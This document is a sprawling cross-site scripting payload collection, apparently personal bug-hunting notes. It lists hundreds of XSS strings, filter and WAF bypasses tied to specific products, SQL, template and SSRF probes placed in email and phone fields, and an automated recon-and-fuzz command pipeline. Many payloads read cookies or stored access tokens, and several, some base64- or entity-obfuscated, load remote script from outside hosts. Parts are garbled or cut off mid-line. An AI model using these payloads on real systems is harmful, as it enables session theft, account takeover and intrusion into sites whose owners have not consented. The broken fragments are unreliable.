xss 1

javascript%3avar{a%3aonerror}%3d{a%3aalert}%3bthrow%2520document.cookie

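  1. Bypassing a filter that blocks the single quote ('): the input ?url=home%26apos;-alert(1)// is reflected as onclick="location='/home'-alert(1)//'". The HTML parser decodes &apos; inside the attribute before the handler runs, so blocking the literal ' is not enough; the value has to be escaped for the JavaScript string and & has to be HTML-encoded on output.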

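  2. Bypassing a filter that blocks the colon (:): the input ?url=javascript%26colon;alert(1) is reflected as href="javascript:alert(1)". &colon; is decoded in the attribute before the URL scheme is evaluated, so the scheme check has to run on the decoded value and allow only expected schemes (for example http and https).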

</base</sTyle/</scRIpt/</textArea/</noScript/</tiTle/--><h1/

<image/onerror="import('data:application/javascript;charset=utf-8;base64,YWxlcnQoZG9jdW1lbnQuZG9tYWluKTtjb25zb2xlLmxvZyhkb2N1bWVudC5kb21haW4pOy8v')//%27"src>

#"></div><a href= javascript:alert(document.domain)

/?url=http://me6.com/aem/xss2.svg

/;/;/resource/md/get/url?url=http://oast.pro

\u003e\u003cimg src=1

<Svg Only=1 OnLoad=confirm(atob("Q2xvdWRmbGFyZSBCeXBhc3NlZCA6KQ=="))>

onerror=alert(9)\u003e

AutoFocus/>/OnFocus=top?."ale"+"rt"/

<s\Cr\ipt\>alert(document\.cookie)<\/s\Cr\ipt\>\;\/>

<Svg Only=1 OnLoad=confirm(atob("Q2xvdWRmbGFyZSBCeXBhc3NlZCA6KQ=="))>

❌<details/open=/Open/href=/data=+ontoggle="(alert)(document.domain)

automated xss <img/src="x"/onerror=prompt()>

' OR 1=1 ​

Login email field

["');alert('XSS');//"]@xyz.xxx

test@gmail.com%27%22%3E%3Csvg/onload=alert(/xss/)%3E

12345-abc-1-23456<script>alert(document.cookie)<%2Fscript>.img

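Phone number field: XSS and other injection tests (all use the ;phone-context= and ;ext= parameters of the tel: URI syntax, so they depend on the field accepting more than a strict number format)

XSS - +441134960000;phone-context=alert(0)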

Parameter pollution (1) - +441134960000;phone-context=&phone-context=+442..

Parameter pollution (2) - +441134960000;ext=1;ext=?

SQL injection +441134960000;phone-context=' OR 1=1; --

Template injection +441134960000;phone-context={{22}}[ [33]]{{77}}{77}{7*’7}

SSRF +441134960000;phone-context=http://burocoaborator.net

waybackurls http://testphp.vulnweb.com | urldedupe -qs | bhedak '"><svg onload=confirm(1)>' | airixss -payload "confirm(1)" | egrep -v 'Not'

amass enum -d hackerone.com -o hackerone.txt # Recon all subdomains. 
xargs -a allsub.txt -I@ sh -c 'python3 ~/ParamSpider/paramspider.py -d @ -l high' # Do Parameter fuzzing. 
cat *.txt > allsub.txt # Combine fuzzed parameter files in to one main file.  
cat allsub.txt | Gxss -p xss | dalfox pipe --mining-dict-word ~/root/Arjun/arjun/db/params.txt --skip-bav # Run this and wait for Dalfox to trigger XSS.

--'`"><img src=x>kdskf${{7*7}}
{onerror=eval}throw/0/+name
<a href='javascript:alert(document.domain);'>Click Me</a>

javascript:eval('var a=document.createElement('script');a.src='https://bratwork.bxss.in';document.body.appendChild(a)')
"><script src=https://bratwork.bxss.in></script>
"><input onfocus=eval(atob(this.id)) id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vYnJhdHdvcmsuYnhzcy5pbiI7ZG9jdW1lbnQuYm9keS5hcHBlbmRDaGlsZChhKTs&#61;&#61; autofocus>
"><img src=x id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vYnJhdHdvcmsuYnhzcy5pbiI7ZG9jdW1lbnQuYm9keS5hcHBlbmRDaGlsZChhKTs&#61;&#61 onerror=eval(atob(this.id))>
"><video><source onerror=eval(atob(this.id)) id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vYnJhdHdvcmsuYnhzcy5pbiI7ZG9jdW1lbnQuYm9keS5hcHBlbmRDaGlsZChhKTs&#61;&#61;>
"><iframe srcdoc="&#60;&#115;&#99;&#114;&#105;&#112;&#116;&#62;&#118;&#97;&#114;&#32;&#97;&#61;&#112;&#97;&#114;&#101;&#110;&#116;&#46;&#100;&#111;&#99;&#117;&#109;&#101;&#110;&#116;&#46;&#99;&#114;&#101;&#97;&#116;&#101;&#69;&#108;&#101;&#109;&#101;&#110;&#116;&#40;&#34;&#115;&#99;&#114;&#105;&#112;&#116;&#34;&#41;&#59;&#97;&#46;&#115;&#114;&#99;&#61;&#34;&#104;&#116;&#116;&#112;&#115;&#58;&#47;&#47;bratwork.bxss.in&#34;&#59;&#112;&#97;&#114;&#101;&#110;&#116;&#46;&#100;&#111;&#99;&#117;&#109;&#101;&#110;&#116;&#46;&#98;&#111;&#100;&#121;&#46;&#97;&#112;&#112;&#101;&#110;&#100;&#67;&#104;&#105;&#108;&#100;&#40;&#97;&#41;&#59;&#60;&#47;&#115;&#99;&#114;&#105;&#112;&#116;&#62;">
<script>function b(){eval(this.responseText)};a=new XMLHttpRequest();a.addEventListener("load", b);a.open("GET", "//bratwork.bxss.in");a.send();</script>
<script>$.getScript("//bratwork.bxss.in")</script>
xyz"/ng-click="constructor.constructor('alert(1)')()

<svg onload=alert(1)>
"><svg onload=alert(1)>
</tag><svg onload=alert(1)>
"></tag><svg onload=alert(1)>
"onmouseover=alert(1) //
"autofocus onfocus=alert(1) //
'-alert(1)-'
'/alert(1)//
\'/alert(1)//
</script><svg onload=alert(1)>
'}alert(1);{'
'}alert(1)%0A{'
\'}alert(1);{//
/alert(1)//\
/alert(1)}//\
${alert(1)}
'onload=alert(1)><svg/1='
'>alert(1)</script><script/1=' 
*/alert(1)</script><script>/*
*/alert(1)">'onload="/*<svg/1=' 
`-alert(1)">'onload="`<svg/1='
*/</script>'>alert(1)/*<script/1='
p=<svg/1='&q='onload=alert(1)>
p=<svg 1='&q='onload='/*&r=*/alert(1)'>
q=<script/&q=/src=data:&q=alert(1)>
<svg xmlns="http://www.w3.org/2000/svg" onload="alert(1)"/>
<img src=1 onerror=alert(1)>
<iframe src=javascript:alert(1)>
<details open ontoggle=alert(1)>
<svg><svg onload=alert(1)>
data:text/html,<img src=1 onerror=alert(1)>
data:text/html,<iframe src=javascript:alert(1)>
[clickme](javascript:alert`1`)
<script src=data:,alert(1)>
<script src=//brutelogic.com.br/1.js>
<iframe src=TARGET_URL onload="frames[0].postMessage('INJECTION','*')">
{{$new.constructor('alert(1)')()}}
<x ng-app>{{$new.constructor('alert(1)')()}}
<<!--%23set var="x" value="svg onload=alert(1)"--><!--%23echo var="x"-->>
(alert)(1)
a=alert,a(1)
[1].find(alert)
top["al"+"ert"](1)
top[/al/.source+/ert/.source](1)
al\u0065rt(1)
top['al\145rt'](1)
top[8680439..toString(30)](1)
[]['\146\151\154\164\145\162']['\143\157\156\163\164\162\165\143\164\157\162']
('\141\154\145\162\164\50\61\51')()
write`XSSed!`
write`<img/src/o&#78error=alert&lpar;1)&gt;`
write('\74img/src/o\156error\75alert\501\51\76')
top.open`javas\cript:al\ert\x281\x29`
top.open`javas\cript:al\ert\x281\x29${0}0`
${alert(1)}<svg onload=eval('`//'+URL)>
"o<x>nmouseover=alert<x>(1)//
 "autof<x>ocus o<x>nfocus=alert<x>(1)//
<script src=//www.google.com/complete/search?client=chrome%26jsonp=alert(1)>
</script>
<script src=//www.googleapis.com/customsearch/v1?callback=alert(1)></script>
<script src=//ajax.googleapis.com/ajax/libs/angularjs/1.6.0/angular.min.js>
</script><x ng-app ng-csp>{{$new.constructor('alert(1)')()}}
<svg><a><rect width=99% height=99% /><animate attributeName=href 
to=javascript:alert(1)>
<svg><a><rect width=99% height=99% /><animate attributeName=href 
values=javascript:alert(1)>
<svg><a><rect width=99% height=99% /><animate attributeName=href to=0 
from=javascript:alert(1)>
<svg><use xlink:href=data:image/svg
%2Bxml;base64,PHN2ZyBpZD0ieCIgeG1sbnM9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAv
c3ZnIiB4bWxuczp4bGluaz0iaHR0cDovL3d3dy53My5vcmcvMTk5OS94bGluayI
%2BPGVtYmVkIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hodG1sIiBzcmM9Imp
hdmFzY3JpcHQ6YWxlcnQoMSkiLz48L3N2Zz4=%23x>
<script>alert(1)</script> 
<script src=data:,alert(1)> 
<iframe src=javascript:alert(1)> 
<embed src=javascript:alert(1)> 
<a href=javascript:alert(1)>click 
<math><brute href=javascript:alert(1)>click 
<form action=javascript:alert(1)><input type=submit> 
<isindex action=javascript:alert(1) type=submit value=click> 
<form><button formaction=javascript:alert(1)>click 
<form><input formaction=javascript:alert(1) type=submit value=click> 
<form><input formaction=javascript:alert(1) type=image value=click> 
<form><input formaction=javascript:alert(1) type=image src=SOURCE> 
<isindex formaction=javascript:alert(1) type=submit value=click> 
<object data=javascript:alert(1)> 
<iframe srcdoc=<svg/o&#x6Eload&equals;alert&lpar;1)&gt;> 
<svg><script xlink:href=data:,alert(1) /> 
<math><brute xlink:href=javascript:alert(1)>click
<x oncopy=alert(1)>copy this! 
<x oncontextmenu=alert(1)>right click this! 
<x onauxclick=alert(1)>right click this!
<x oncut=alert(1)>copy this! 
<x ondblclick=alert(1)>double click this! 
<x ondrag=alert(1)>drag this! 
<x contenteditable onfocus=alert(1)>focus this! 
<x contenteditable oninput=alert(1)>input here! 
<x contenteditable onkeydown=alert(1)>press any key! 
<x contenteditable onkeypress=alert(1)>press any key! 
<x contenteditable onkeyup=alert(1)>press any key! 
<x onmousedown=alert(1)>click this! 
<x onmouseenter=alert(1)>hover this
<x onmousemove=alert(1)>hover this! 
<x onmouseout=alert(1)>hover this! 
<x onmouseover=alert(1)>hover this! 
<x onmouseup=alert(1)>click this! 
<x contenteditable onpaste=alert(1)>paste here!
<x onpointercancel=alert(1)>hover this!
<x onpointerdown=alert(1)>hover this!
<x onpointerenter=alert(1)>hover this!
<x onpointerleave=alert(1)>hover this!
<x onpointermove=alert(1)>hover this!
<x onpointerout=alert(1)>hover this!
<x onpointerover=alert(1)>hover this!
<x onpointerup=alert(1)>hover this!
<x onpointerrawupdate=alert(1)>hover this!
">'-alert(1)-'<svg>
">&#39-alert(1)-&#39<svg>
">alert(1)-"<svg>
"&#34>alert(1)-&#34<svg>
<svg/on<script><script>load=alert(1)//</script>
%u003Csvg onload=alert(1)>
%u3008svg onload=alert(2)> 
%uFF1Csvg onload=alert(3)>
"><svg/onload=alert(1)>"@x.y
javascript://%250Aalert(1)
<x onanimationend=alert(1)><style>x{animation:s}@keyframes s{}
<x onanimationstart=alert(1)><style>x{animation:s}@keyframes s{}
<x onwebkitanimationend=alert(1)><style>x{animation:s}@keyframes s{}
<x onwebkitanimationstart=alert(1)><style>x{animation:s}@keyframes s{}
<x ontransitionend=alert(1)><style>*{transition:color 1s}*:hover{color:red}
<x ontransitionrun=alert(1)><style>*{transition:color 1s}*:hover{color:red}
<x ontransitionstart=alert(1)><style>*{transition:color 1s}*:hover{color:red}
<x ontransitioncancel=alert(1)><style>*{transition:color 1s}*:hover{color:red
<a autofocus onfocus=alert(1) href></a>
<a autofocus onfocusin=alert(1) href></a>
<a contenteditable onbeforeinput=alert(1)>test
<a draggable="true" ondrag="alert(1)" style=display:block>test</a>
<a draggable="true" ondragend="alert(1)" style=display:block>test</a>
<a draggable="true" ondragenter="alert(1)" style=display:block>test</a>
<a draggable="true" ondragleave="alert(1)" style=display:block>test</a>
<a draggable="true" ondragstart="alert(1)" style=display:block>test</a>
<a id=x style="transition:outline 1s" ontransitionend=alert(1) tabindex=1></a>
<a id=x tabindex=1 onfocus=alert(1)></a>
<a id=x tabindex=1 onfocusin=alert(1)></a>
<a onbeforecopy="alert(1)" contenteditable>test</a>
<a onbeforecut="alert(1)" contenteditable>test</a>
<div draggable="true" contenteditable>drag me</div><br ondragover=alert(1) contenteditable style=display:block>drop here</br>
<div draggable="true" contenteditable>drag me</div><br ondrop=alert(1) contenteditable style=display:block>drop here</br>
<div draggable="true" contenteditable>drag me</div><button ondragover=alert(1) contenteditable style=display:block>drop here</button>
<div draggable="true" contenteditable>drag me</div><button ondrop=alert(1) contenteditable style=display:block>drop here</button>
<div draggable="true" contenteditable>drag me</div><canvas ondragover=alert(1) contenteditable style=display:block>drop here</canvas>
<div draggable="true" contenteditable>drag me</div><canvas ondrop=alert(1) contenteditable style=display:block>drop here</canvas>
<div draggable="true" contenteditable>drag me</div><caption ondragover=alert(1) contenteditable style=display:block>drop here</caption>
<div draggable="true" contenteditable>drag me</div><caption ondrop=alert(1) contenteditable style=display:block>drop here</caption>
<div draggable="true" contenteditable>drag me</div><center ondragover=alert(1) contenteditable style=display:block>drop here</center>
<div draggable="true" contenteditable>drag me</div><center ondrop=alert(1) contenteditable style=display:block>drop here</center>
<div draggable="true" contenteditable>drag me</div><cite ondragover=alert(1) contenteditable style=display:block>drop here</cite>
<div draggable="true" contenteditable>drag me</div><cite ondrop=alert(1) contenteditable style=display:block>drop here</cite>
<div draggable="true" contenteditable>drag me</div><code ondragover=alert(1) contenteditable style=display:block>drop here</code>
<div draggable="true" contenteditable>drag me</div><code ondrop=alert(1) contenteditable style=display:block>drop here</code>
<div draggable="true" contenteditable>drag me</div><col ondragover=alert(1) contenteditable style=display:block>drop here</col>
<div draggable="true" contenteditable>drag me</div><col ondrop=alert(1) contenteditable style=display:block>drop here</col>
<div draggable="true" contenteditable>drag me</div><colgroup ondragover=alert(1) contenteditable style=display:block>drop here</colgroup>
<div draggable="true" contenteditable>drag me</div><colgroup ondrop=alert(1) contenteditable style=display:block>drop here</colgroup>
<div draggable="true" contenteditable>drag me</div><command ondragover=alert(1) contenteditable style=display:block>drop here</command>
<div draggable="true" contenteditable>drag me</div><command ondrop=alert(1) contenteditable style=display:block>drop here</command>
<div draggable="true" contenteditable>drag me</div><content ondragover=alert(1) contenteditable style=display:block>drop here</content>
<div draggable="true" contenteditable>drag me</div><content ondrop=alert(1) contenteditable style=display:block>drop here</content>
<div draggable="true" contenteditable>drag me</div><custom tags ondragover=alert(1) contenteditable style=display:block>drop here</custom tags>
<div draggable="true" contenteditable>drag me</div><custom tags ondrop=alert(1) contenteditable style=display:block>drop here</custom tags>
<div draggable="true" contenteditable>drag me</div><data ondragover=alert(1) contenteditable style=display:block>drop here</data>
<div draggable="true" contenteditable>drag me</div><data ondrop=alert(1) contenteditable style=display:block>drop here</data>
<div draggable="true" contenteditable>drag me</div><datalist ondragover=alert(1) contenteditable style=display:block>drop here</datalist>
<div draggable="true" contenteditable>drag me</div><datalist ondrop=alert(1) contenteditable style=display:block>drop here</datalist>
<div draggable="true" contenteditable>drag me</div><dd ondragover=alert(1) contenteditable style=display:block>drop here</dd>
<div draggable="true" contenteditable>drag me</div><dd ondrop=alert(1) contenteditable style=display:block>drop here</dd>
<div draggable="true" contenteditable>drag me</div><del ondragover=alert(1) contenteditable style=display:block>drop here</del>
<div draggable="true" contenteditable>drag me</div><del ondrop=alert(1) contenteditable style=display:block>drop here</del>
<div draggable="true" contenteditable>drag me</div><details ondragover=alert(1) contenteditable style=display:block>drop here</details>
<div draggable="true" contenteditable>drag me</div><details ondrop=alert(1) contenteditable style=display:block>drop here</details>
<div draggable="true" contenteditable>drag me</div><dfn ondragover=alert(1) contenteditable style=display:block>drop here</dfn>
<div draggable="true" contenteditable>drag me</div><dfn ondrop=alert(1) contenteditable style=display:block>drop here</dfn>
<div draggable="true" contenteditable>drag me</div><dialog ondragover=alert(1) contenteditable style=display:block>drop here</dialog>
<div draggable="true" contenteditable>drag me</div><dialog ondrop=alert(1) contenteditable style=display:block>drop here</dialog>
<div draggable="true" contenteditable>drag me</div><dir ondragover=alert(1) contenteditable style=display:block>drop here</dir>
<div draggable="true" contenteditable>drag me</div><dir ondrop=alert(1) contenteditable style=display:block>drop here</dir>
<div draggable="true" contenteditable>drag me</div><div ondragover=alert(1) contenteditable style=display:block>drop here</div>
<div draggable="true" contenteditable>drag me</div><div ondrop=alert(1) contenteditable style=display:block>drop here</div>
<div draggable="true" contenteditable>drag me</div><dl ondragover=alert(1) contenteditable style=display:block>drop here</dl>
<div draggable="true" contenteditable>drag me</div><dl ondrop=alert(1) contenteditable style=display:block>drop here</dl>
<div draggable="true" contenteditable>drag me</div><dt ondragover=alert(1) contenteditable style=display:block>drop here</dt>
<div draggable="true" contenteditable>drag me</div><dt ondrop=alert(1) contenteditable style=display:block>drop here</dt>
<div draggable="true" contenteditable>drag me</div><element ondragover=alert(1) contenteditable style=display:block>drop here</element>
<div draggable="true" contenteditable>drag me</div><element ondrop=alert(1) contenteditable style=display:block>drop here</element>
<div draggable="true" contenteditable>drag me</div><em ondragover=alert(1) contenteditable style=display:block>drop here</em>
<div draggable="true" contenteditable>drag me</div><em ondrop=alert(1) contenteditable style=display:block>drop here</em>
<div draggable="true" contenteditable>drag me</div><embed ondragover=alert(1) contenteditable style=display:block>drop here</embed>
<div draggable="true" contenteditable>drag me</div><embed ondrop=alert(1) contenteditable style=display:block>drop here</embed>
<div draggable="true" contenteditable>drag me</div><fieldset ondragover=alert(1) contenteditable style=display:block>drop here</fieldset>
<div draggable="true" contenteditable>drag me</div><fieldset ondrop=alert(1) contenteditable style=display:block>drop here</fieldset>
<div draggable="true" contenteditable>drag me</div><figcaption ondragover=alert(1) contenteditable style=display:block>drop here</figcaption>
<div draggable="true" contenteditable>drag me</div><figcaption ondrop=alert(1) contenteditable style=display:block>drop here</figcaption>
<div draggable="true" contenteditable>drag me</div><figure ondragover=alert(1) contenteditable style=display:block>drop here</figure>
<div draggable="true" contenteditable>drag me</div><figure ondrop=alert(1) contenteditable style=display:block>drop here</figure>
<div draggable="true" contenteditable>drag me</div><font ondragover=alert(1) contenteditable style=display:block>drop here</font>
<div draggable="true" contenteditable>drag me</div><font ondrop=alert(1) contenteditable style=display:block>drop here</font>
<div draggable="true" contenteditable>drag me</div><footer ondragover=alert(1) contenteditable style=display:block>drop here</footer>
<div draggable="true" contenteditable>drag me</div><footer ondrop=alert(1) contenteditable style=display:block>drop here</footer>
<div draggable="true" contenteditable>drag me</div><form ondragover=alert(1) contenteditable style=display:block>drop here</form>
<div draggable="true" contenteditable>drag me</div><form ondrop=alert(1) contenteditable style=display:block>drop here</form>
<div draggable="true" contenteditable>drag me</div><frame ondragover=alert(1) contenteditable style=display:block>drop here</frame>
<div draggable="true" contenteditable>drag me</div><frame ondrop=alert(1) contenteditable style=display:block>drop here</frame>
<div draggable="true" contenteditable>drag me</div><frameset ondragover=alert(1) contenteditable style=display:block>drop here</frameset>
<div draggable="true" contenteditable>drag me</div><frameset ondrop=alert(1) contenteditable style=display:block>drop here</frameset>
<div draggable="true" contenteditable>drag me</div><h1 ondragover=alert(1) contenteditable style=display:block>drop here</h1>
<div draggable="true" contenteditable>drag me</div><h1 ondrop=alert(1) contenteditable style=display:block>drop here</h1>
<div draggable="true" contenteditable>drag me</div><head ondragover=alert(1) contenteditable style=display:block>drop here</head>
<div draggable="true" contenteditable>drag me</div><head ondrop=alert(1) contenteditable style=display:block>drop here</head>
<div draggable="true" contenteditable>drag me</div><header ondragover=alert(1) contenteditable style=display:block>drop here</header>
<div draggable="true" contenteditable>drag me</div><header ondrop=alert(1) contenteditable style=display:block>drop here</header>
<div draggable="true" contenteditable>drag me</div><hgroup ondragover=alert(1) contenteditable style=display:block>drop here</hgroup>
<div draggable="true" contenteditable>drag me</div><hgroup ondrop=alert(1) contenteditable style=display:block>drop here</hgroup>
<div draggable="true" contenteditable>drag me</div><hr ondragover=alert(1) contenteditable s

Twitter famous

- [alert][0].call(this,1)

yd644%22onmouseover%3D%22confirm(11)%22style%3D%22position%3Aabsolute%3Bwidth%3A100%25%3Bheight%3A100%25%3Btop%3A0%3Bleft%3A0%3B%22t81rgr8p6kr

xss%27);}}});alert(document.cookie);$(function+a(){a();});$(function+a(){if(a){}else+if(a){/*///

Mega7%3EXSS%3CIMG/SRC=https://www.notebookcheck.net/fileadmin/Notebooks/News/_nc3/hacker21.jp

<noscript> &amp;lt;p  title=” &lt;/noscript&gt;
&lt;style onload= alert(document.domain)//&quot;&gt; *{/*all*/color/*all*/:/*all*/#f78fb3/*all*/;} &lt;/style&gt;

<noscript> <p title=” </noscript>
<style onload= alert(document.domain)//”> *{/*all*/color/*all*/:/*all*/#f78fb3/*all*/;} </style>

JavaScript://%250Aalert?.(1)//
'/*\'/*"/*\"/*`/*\`/*%26apos;)/*<!-->
</Title/</Style/</Script/</textArea/</iFrame/</noScript>
\74k<K/contentEditable/autoFocus/OnFocus=
/*${/*/;{/**/(alert)(1)}//><Base/Href=//X55.is\76-->

<a href="javascript&colon;alert&lpar;document&period;domain&rpar;">Click Here</a>

<a href="https://www.domain.tld/m7arm4n" contenteditable onbeforeinput="[origin].map(top['ale'+'rt'])" >here</a>

jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */onMouSeoVer=alert(1) )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert(100)//>\x3e

"%2Bself[%2F*foo*%2F'alert'%2F*bar*%2F](self[%2F*foo*%2F'document'%2F*bar*%2F]['domain'])%2F%2F

%3Cmarquee%3E%3C%2Fbr%3E%3C%2Fbr%3E%27%22%3E%22%3E%3Ciframe%3E%3Cimg%2Fsrc%2Fonerror%3Dalert%28document.domain%29%3E

*/alert()</script><script>/*

<a href="javas%09cript:[1].map(top['ale'+'rt'])">

~~?XSS=<a%20href="javas%09cript:[1].map(top[%27ale%27%2B%27rt%27])">~~

2 reflections, 2 inputs:
p1 = <svg/1='
p2 = 'onload=alert()>

<svg onload=eval(location.hash.slice(1))>
#with(document)body.appendChild(createElement('script')).src='//domain'

1. Replacing alert(1):
'-import('//X55.is')-'
<Svg OnLoad=import('//X55.is')>

2. As href or src attributes:
<Base Href=//X55.is>
<Script Src=//X55.is>

"><img src onerror=alert(1)>
"autofocus onfocus=alert(1)//
</script><script>alert(1)</script>
'-alert(1)-'
\'-alert(1)//
javascript:alert(1)

=> use in uploads or regular input.

XSS (no image)
https://brutelogic.com.br/poc.svg

XSS (valid image)
https://brutelogic.com.br/brute.svg

Redirect (default)
https://brutelogic.com.br/redir.svg

Redirect (custom)
https://brutelogic.com.br/redir.svg?url=//X55.is

Redirect (custom + warning)
https://brutelogic.com.br/redir.svg?url=//X55.is&w=1

d=document,b='`',d['loca'+'tion']='javascript&colon;aler'+'t'+b+domain+b

data:text/html,<form action=https://brutelogic.com.br/xss-waf.php method=post><input type=hidden name=a value="<K Contenteditable Autofocus OnFocusIn=[1].map(alert)>"><input type=submit value=XSS></form>

<a href=//X55.is autofocus onfocus=import(href)>
https://brutelogic.com.br/gym.php?p05=%3Ca+href=//X55.is+autofocus+onfocus=import(href)%3E

<a href=javascript:'\74svg/onload\75alert\501\51\76'>
https://brutelogic.com.br/gym.php?p05=%3Ca+href=javascript:%27%5C74svg/onload%5C75alert%5C501%5C51%5C76%27%3Eclick
javascript:alert(1)
👇
javascript:%61lert(1)
👇
javascript:&#37&#54&#49lert(1)
👇
javascript:%26%2337%26%2354%26%2349lert(1)

<a href="javas%09cript:[1].map(top['ale'+'rt'])">

<a href="javas%09cript:[document['dom'+'ain']].map(top['ale'+'rt'])">

<py-script>
print('\74img/src/onerror\75alert(1)\76')
</py-script>

<a href="javas%09cript:[1].map(top['ale'+'rt'])">
<Tag OnEvent="alert/*>*/(1)"

<Svg OnLoad=confirm(1)>
%C0%BCSvg%C0%A0OnLoad%C0%BDconfirm%C0%A81%C0%A9%C0%BE

<Svg OnLoad=import('//X55.is')>
%C0%BCSvg%C0%A0OnLoad%C0%BDimport%C0%A8%C0%A7%C0%AF%C0%http://AFX55.is%C0%A7%C0%A9%C0%BE

JavaScript%26%2358confirm(1)
JavaScript%26%2358AB:confirm(1)
JavaScript%26%2358%0Bconfirm(1)
JavaScript%26%2358top?confirm(1):0

(jQuery present)
JavaScript%26%2358$;confirm(1)
JavaScript%26%2358$?confirm(1):0

<Svg Only=1 OnLoad=confirm(1)>

1. Replacing alert(1):
'-import('//X55.is')-'
<Svg OnLoad=import('//X55.is')>

2. As href or src attributes:
<Base Href=//X55.is>
<Script Src=//X55.is>

<a href="/*">*/)});
function+__MobileAppList(){alert(1)}//
1\47\42\55\55\41

1\'/[location=`Javas\x63ript:\x63onfirm\x60K\x60`]//

<Svg%K9OnLoad=%7Krompt%6K1%6K>

"<!--><Html%2FOnPointerEnter=%26%2397%26%23108%26%23101%26%23114%26%23116%26%2396K%26%2396<!--

JavaScript://%250Dtop.confirm(1)//?1

<script>alert(1)//
<script>alert(1)<!--
<script>alert(1)%0A-->
<script src=data:,alert(1)>
<script src=//HOST/FILE>
<script src=https:DOMAIN/FILE>
<svg><script xlink:href=//HOST/FILE>
<svg><script xlink:href=https:DOMAIN/FILE>

Wordfence 7.4.2
<a href=&#01javascript:alert(1)>

Sucuri CloudProxy (POST only)
<a href=javascript&colon;confirm(1)>

ModSecurity CRS 3.2.0 PL1
<a href="jav%0Dascript&colon;alert(1)">

<script>alert(localStorage.getItem(‘ServiceProvider.*****.username@company.com.accessToken’))</script>
<h1 class="xxx" onmouseover=alert(document.domain)>Shop Now</h1>.

<!--><svg+onload=%27top[%2fal%2f%2esource%2b%2fert%2f%2esource](document.cookie)%27>
<video poster=javascript:alert(1)//></video>

<%fscripT><script>confirm(document.domain)<%2fscripT>

javascript:{ alert`0` }
1'"><img/src/onerror=.1|alert``>

%3C/title%3E%3Cscript%3Ealert(document.domain)%3C/script%3E

"></script><svg onload=%26%2397%3B%26%23108%3B%26%23101%3B%26%23114%3B%26%23116%3B(document.domain)>

HackerOne report to find xss

%3C/title%3E%3Cscript%3Ealert(document.domain)%3C/script%3E http://host/path/to/image'onerror=alert(1);//.png

cPanel

http://example.com/cpanelwebcall/<img%20src=x%20onerror="prompt(1)">aaaaaaaaaaaa
http://example.com:2082/cpanelwebcall/<img%20src=x%20onerror="prompt(1)">aaaaaaaaaaaa
http://example.com:2086/cpanelwebcall/<img%20src=x%20onerror="prompt(1)">aaaaaaaaaaaa
http://example.com:2082/cpanelwebcall/<img%20src=x%20onerror="prompt(1)">aaaaaaaaaaaa
